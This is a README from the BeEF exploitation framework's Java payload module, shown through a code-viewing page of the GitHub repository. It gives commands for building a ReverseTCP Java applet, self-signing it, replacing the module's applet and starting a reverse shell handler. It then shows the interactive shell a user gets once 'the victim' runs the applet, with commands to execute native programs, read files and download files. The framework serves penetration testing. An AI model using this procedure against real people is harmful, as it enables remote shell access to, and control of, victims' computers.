Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/local_host/java_payload/README.txt
1154 views
1
--- How to use this module ---

2
The following is how you compile the JavaPayload handlers :

3


4
$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git

5
$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar

6
$cd .. && ant compile && ant jar

7
$cd build/bin

8
$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP

9


10
At this point you have the applet ready to go, with a reverseTCP handler:

11
Applet_ReverseTCP.jar

12
Note that the applet in this module is already compiled (with Java 7, you might want to recompile it

13
with Java 6 to run it on those versions too - SUGGESTED :-).

14


15
At this stage you need to sign the applet.

16
The following is to create a self-signed certificate and then sign it.

17
Obviously if you have a valid code signing certificate, even better ;)

18


19
keytool -keystore tmp -genkey

20
jarsigner -keystore tmp Applet_ReverseTCP.jar mykey

21


22
Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.

23


24
You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):

25
java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh

26


27
Now launch the BeEF module.

28
If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:

29
antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh

30
! help

31
help: show information about commands.

32
  Usage: help [command]

33


34
Supported commands:

35
    help   - show this help

36
    info   - list system properties

37
    pwd    - show current directory

38
    cd     - change directory

39
    ls     - list directory

40
    exec   - execute native command

41
    cat    - show text file

42
    wget   - download file

43
    telnet - create TCP connection

44
    paste  - create text file

45
    jobs   - list or continue jobs

46
    exit   - Exit JSh

47


48
When inside an interactive command, enter ~. on a new

49
line to exit from that command. Enter ~& to background the command.

50
Enter ~~ to start a line with a ~ character

51